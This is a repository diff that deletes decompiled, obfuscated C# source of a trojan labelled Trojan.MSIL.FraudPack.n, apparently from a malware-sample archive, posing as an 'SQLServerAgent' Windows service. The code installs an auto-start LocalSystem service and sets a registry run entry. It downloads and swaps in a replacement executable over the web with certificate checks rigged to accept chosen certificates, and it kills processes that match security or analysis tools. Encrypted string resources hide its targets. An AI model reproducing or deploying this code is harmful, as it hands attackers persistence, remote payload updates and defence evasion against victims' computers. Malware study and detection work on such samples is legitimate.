</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.Management" />
<Reference Include="System.ServiceProcess" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="_000E.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="  " />
<EmbeddedResource Include="_0003.resx" />
<EmbeddedResource Include="_0005.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/Trojan.MSIL.FraudPack.n.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQLServerAgent", "Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.csproj", "{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

15
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0002.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using System.ServiceProcess;
internal static class \u0002
{
private static void \u0002() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new \u0005()
});
}

44
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0003.cs
View File

@ -1,44 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;
[RunInstaller(true)]
public sealed class \u0003 : Installer
{
private IContainer \u0002 = (IContainer) null;
private ServiceProcessInstaller \u0003;
private ServiceInstaller \u0005;
public \u0003() => this.\u0002();
protected override void Dispose(bool _param1)
{
if (_param1 && this.\u0002 != null)
this.\u0002.Dispose();
base.Dispose(_param1);
}
private void \u0002()
{
this.\u0003 = new ServiceProcessInstaller();
this.\u0005 = new ServiceInstaller();
this.\u0003.Account = ServiceAccount.LocalSystem;
this.\u0003.Password = (string) null;
this.\u0003.Username = (string) null;
this.\u0005.Description = \u0008.\u0002(1356208612);
this.\u0005.DisplayName = \u0008.\u0002(1356208604);
this.\u0005.ServiceName = \u0008.\u0002(1356208604);
this.\u0005.StartType = ServiceStartMode.Automatic;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.\u0003,
(Installer) this.\u0005
});
}
}

120
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0003.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

499
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0005.cs
View File

@ -1,499 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.ServiceProcess;
using System.Text;
using System.Threading;
using System.Timers;
public sealed class \u0005 : ServiceBase
{
private string \u0002;
private bool \u0003 = false;
private bool \u0005 = false;
private string \u0008;
private string \u0006;
private string \u000E;
private string \u000F;
private int \u0002\u2000;
private string \u0003\u2000 = string.Empty;
private bool \u0005\u2000 = false;
private System.Timers.Timer \u0008\u2000 = new System.Timers.Timer(30000.0);
private IContainer \u0006\u2000 = (IContainer) null;
private BackgroundWorker \u000E\u2000;
private BackgroundWorker \u000F\u2000;
public \u0005() => this.\u000E();
protected override void OnStart(string[] _param1)
{
this.\u0008();
this.\u0002();
this.\u0002 = \u0005.\u0002();
this.\u0003();
this.\u0005();
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u0008.\u0002(1356208489), RegistryKeyPermissionCheck.ReadWriteSubTree);
this.\u0002\u2000 = (int) subKey.GetValue(\u0008.\u0002(1356208422));
subKey.Close();
System.Timers.Timer timer1 = new System.Timers.Timer(1000.0);
timer1.Elapsed += new ElapsedEventHandler(this.\u0005);
timer1.AutoReset = true;
timer1.Enabled = true;
this.\u0008\u2000.Elapsed += new ElapsedEventHandler(this.\u0003);
this.\u0008\u2000.AutoReset = true;
this.\u0008\u2000.Enabled = false;
System.Timers.Timer timer2 = new System.Timers.Timer(60000.0);
timer2.Elapsed += new ElapsedEventHandler(this.\u0002);
timer2.AutoReset = true;
timer2.Enabled = true;
}
private void \u0002()
{
try
{
this.\u0002(\u0008.\u0002(1356208433));
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
registryKey.DeleteValue(\u0008.\u0002(1356208433));
registryKey.Close();
System.IO.File.Delete(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208368));
}
catch
{
}
}
private void \u0002(object _param1, ElapsedEventArgs _param2)
{
if (this.\u0005\u2000)
return;
this.\u0005();
}
private string \u0002(string _param1)
{
if (!System.IO.File.Exists(_param1))
return string.Empty;
StringBuilder stringBuilder = new StringBuilder();
try
{
FileStream inputStream = new FileStream(_param1, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
inputStream.Close();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
}
catch
{
return string.Empty;
}
return stringBuilder.ToString();
}
private void \u0003()
{
try
{
this.\u0008 = this.\u0003(\u0008.\u0002(1356208293) + this.\u0003\u2000 + \u0008.\u0002(1356208257)).Split('-')[0];
}
catch
{
}
}
private void \u0005() => this.\u000E = this.\u0002(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208275));
private static string \u0002()
{
string empty = string.Empty;
foreach (ManagementObject instance in new ManagementClass(\u0008.\u0002(1356208197)).GetInstances())
{
if (empty == string.Empty)
{
empty = instance.Properties[\u0008.\u0002(1356208219)].Value.ToString();
break;
}
}
string str1 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
ManagementObject managementObject = new ManagementObject(\u0008.\u0002(1356208173) + str1 + \u0008.\u0002(1356208144));
managementObject.Get();
string str2 = managementObject[\u0008.\u0002(1356208153)].ToString();
byte[] hash = MD5.Create().ComputeHash(Encoding.Default.GetBytes(empty + str2));
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
return stringBuilder.ToString();
}
private string \u0003(string _param1)
{
try
{
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
StringBuilder stringBuilder = new StringBuilder();
byte[] numArray = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
int count;
do
{
count = responseStream.Read(numArray, 0, numArray.Length);
if (count != 0)
{
string str = Encoding.ASCII.GetString(numArray, 0, count);
stringBuilder.Append(str);
}
}
while (count > 0);
responseStream.Flush();
return stringBuilder.ToString();
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 ? this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356209101))) : string.Empty;
}
}
private void \u0002(string _param1)
{
foreach (Process process in Process.GetProcessesByName(_param1))
process.Kill();
}
private void \u0008()
{
try
{
if (!System.IO.File.Exists(\u0008.\u0002(1356209061)))
return;
this.\u0003\u2000 = \u0008.\u0002(1356209033);
}
catch
{
}
}
private string \u0002()
{
TextReader textReader = (TextReader) new StreamReader(\u0008.\u0002(1356209041));
string end = textReader.ReadToEnd();
textReader.Close();
return end;
}
private bool \u0002(string _param1, string _param2)
{
TextWriter textWriter = (TextWriter) new StreamWriter(\u0008.\u0002(1356209003) + _param1 + \u0008.\u0002(1356209013));
textWriter.WriteLine(_param2);
textWriter.Close();
return true;
}
private bool \u0003(string _param1, string _param2)
{
try
{
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
byte[] buffer = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
FileStream output = new FileStream(_param2, FileMode.OpenOrCreate);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
int count;
do
{
count = responseStream.Read(buffer, 0, buffer.Length);
if (count != 0)
binaryWriter.Write(buffer, 0, count);
}
while (count > 0);
responseStream.Flush();
binaryWriter.Close();
output.Close();
return true;
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 && this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356208960)), _param2);
}
}
private void \u0006()
{
if (this.\u0008 != this.\u000E || this.\u0008 == string.Empty)
this.\u0003();
if (!(this.\u0008 != this.\u000E) || !(this.\u0008 != string.Empty))
return;
this.\u0003 = true;
string tempPath = Path.GetTempPath();
this.\u000E\u2000.RunWorkerAsync((object) new string[2]
{
\u0008.\u0002(1356208985) + this.\u0003\u2000 + \u0008.\u0002(1356208948),
tempPath + \u0008.\u0002(1356208920)
});
}
public void \u0005\u2004\u2006\u2009\u2001\u2009\u2009\u2004\u2001\u2001\u2003\u2001\u2008\u2008\u2003\u200A\u2001()
{
string[] strArray1 = new string[1]
{
\u0008.\u0002(1356208871)
};
string[] strArray2 = new string[2]
{
\u0008.\u0002(1356208892),
\u0008.\u0002(1356208846)
};
string[] strArray3 = new string[2]
{
\u0008.\u0002(1356208800),
\u0008.\u0002(1356208815)
};
string[] strArray4 = new string[1]
{
\u0008.\u0002(1356208772)
};
string[] strArray5 = new string[1]
{
\u0008.\u0002(1356208795)
};
string[] strArray6 = new string[1]
{
\u0008.\u0002(1356208758)
};
string[] strArray7 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208735)
};
string[] strArray8 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208688)
};
string[] strArray9 = new string[3]
{
\u0008.\u0002(1356208640),
\u0008.\u0002(1356208655),
\u0008.\u0002(1356208670)
};
string[][] strArray10 = new string[10][]
{
strArray1,
strArray2,
strArray3,
strArray4,
strArray5,
strArray6,
strArray7,
strArray8,
strArray9,
strArray1
};
foreach (Process process in Process.GetProcesses())
{
try
{
string directoryName = Path.GetDirectoryName(process.MainModule.FileName);
string fileName = Path.GetFileName(process.MainModule.FileName);
string mainWindowTitle = process.MainWindowTitle;
if (mainWindowTitle.IndexOf(\u0008.\u0002(1356209645)) != -1 || mainWindowTitle.IndexOf(\u0008.\u0002(1356209661)) != -1 || fileName.IndexOf(\u0008.\u0002(1356209614)) != -1)
{
process.Kill();
}
else
{
for (int index1 = 0; index1 < strArray10.Length; ++index1)
{
string[] strArray11 = strArray10[index1];
bool flag = true;
for (int index2 = 0; index2 < strArray11.Length; ++index2)
{
string str = strArray11[index2];
if (!System.IO.File.Exists(directoryName + \u0008.\u0002(1356209568) + str))
{
flag = false;
break;
}
}
if (flag)
{
process.Kill();
break;
}
}
}
}
catch
{
}
}
}
private bool \u0002()
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else if (processesByName[index].MainWindowHandle.ToInt32() != 0)
flag = true;
else
processesByName[index].Kill();
}
return flag;
}
private void \u0003(object _param1, ElapsedEventArgs _param2)
{
this.\u0005\u2000 = false;
this.\u0008\u2000.Enabled = false;
}
private void \u0005(object _param1, ElapsedEventArgs _param2)
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
if (System.IO.File.Exists(str + \u0008.\u0002(1356209593)))
{
try
{
System.IO.File.Delete(str + \u0008.\u0002(1356209593));
}
catch
{
}
this.\u0002(\u0008.\u0002(1356208433));
this.\u0005\u2000 = true;
this.\u0008\u2000.Enabled = true;
}
if (this.\u0005\u2000)
return;
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
string empty1 = string.Empty;
string empty2 = string.Empty;
try
{
empty1 = (string) registryKey.GetValue(\u0008.\u0002(1356209512));
}
catch
{
}
try
{
if (empty1 != str + \u0008.\u0002(1356208275))
{
registryKey.CreateSubKey(\u0008.\u0002(1356209512));
registryKey.SetValue(\u0008.\u0002(1356209512), (object) (str + \u0008.\u0002(1356208275)));
}
}
catch
{
}
registryKey.Close();
if (this.\u0003)
return;
this.\u0006();
if (this.\u0003)
return;
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else
flag = true;
}
if (flag)
return;
try
{
Process.Start(str + \u0008.\u0002(1356208275));
}
catch
{
}
}
protected override void OnStop()
{
}
private void \u0002(object _param1, DoWorkEventArgs _param2)
{
}
private void \u0003(object _param1, DoWorkEventArgs _param2)
{
string[] strArray = (string[]) _param2.Argument;
string str1 = strArray[0];
string sourceFileName = strArray[1];
if (this.\u0003(str1, sourceFileName))
{
Path.GetTempPath();
string str2 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
this.\u0002(\u0008.\u0002(1356208433));
this.\u0002(\u0008.\u0002(1356209576));
Thread.Sleep(3000);
try
{
if (System.IO.File.Exists(str2 + \u0008.\u0002(1356208275)))
System.IO.File.Delete(str2 + \u0008.\u0002(1356208275));
if (!Directory.Exists(str2 + \u0008.\u0002(1356209527)))
Directory.CreateDirectory(str2 + \u0008.\u0002(1356209527));
System.IO.File.Move(sourceFileName, str2 + \u0008.\u0002(1356208275));
}
catch
{
}
this.\u000E = this.\u0008;
}
this.\u0003 = false;
}
private void \u0005(object _param1, DoWorkEventArgs _param2)
{
}
protected override void Dispose(bool _param1)
{
if (_param1 && this.\u0006\u2000 != null)
this.\u0006\u2000.Dispose();
base.Dispose(_param1);
}
private void \u000E()
{
this.\u000E\u2000 = new BackgroundWorker();
this.\u000F\u2000 = new BackgroundWorker();
this.\u000E\u2000.DoWork += new DoWorkEventHandler(this.\u0003);
this.\u000F\u2000.DoWork += new DoWorkEventHandler(this.\u0005);
this.ServiceName = \u0008.\u0002(1356208604);
}
public sealed class \u0002 : ICertificatePolicy
{
public bool CheckValidationResult(
ServicePoint _param1,
X509Certificate _param2,
WebRequest _param3,
int _param4)
{
string serialNumberString = _param2.GetSerialNumberString();
return !(serialNumberString != \u0008.\u0002(1356208567)) || !(serialNumberString != \u0008.\u0002(1356208528));
}
}
}

120
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0005.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

31
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0006.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}

209
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0008.cs
View File

@ -1,209 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(51);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static int \u0006;
private static byte[] \u000E;
private static int \u000F;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
lock (\u0008.\u0002)
{
string str1;
byte[] numArray1;
for (; !\u0008.\u0002.TryGetValue(_param0, out str1); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
{
int num1;
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
Assembly.GetCallingAssembly();
\u0008.\u0006 = 1610370;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream("  \u200B");
int skipFrames = 1;
StackTrace stackTrace = new StackTrace(skipFrames, false);
\u0008.\u0006 ^= 6470 | skipFrames;
int index = skipFrames - 1;
StackFrame frame = stackTrace.GetFrame(index);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
\u0008.\u0006 ^= index + 128;
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
if (frame == null)
\u0008.\u0006 ^= 219315;
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
\u0008.\u0006 ^= 160;
if (!flag)
{
flag = (object) type == null;
if (flag)
\u0008.\u0006 ^= 219283;
}
if (flag == (stackTrace != null))
\u0008.\u0006 ^= 32;
\u0008.\u0006 ^= 6502 | index + 1;
\u0008.\u0003 = new BinaryReader(manifestResourceStream);
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ (int) (short) -~~-~-~-~23109);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ (int) (short) -~~-~-~-~11326);
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
Assembly assembly = executingAssembly;
AssemblyName assemblyName;
try
{
assemblyName = assembly.GetName();
}
catch
{
assemblyName = new AssemblyName(assembly.FullName);
}
\u0008.\u000E = assemblyName.GetPublicKeyToken();
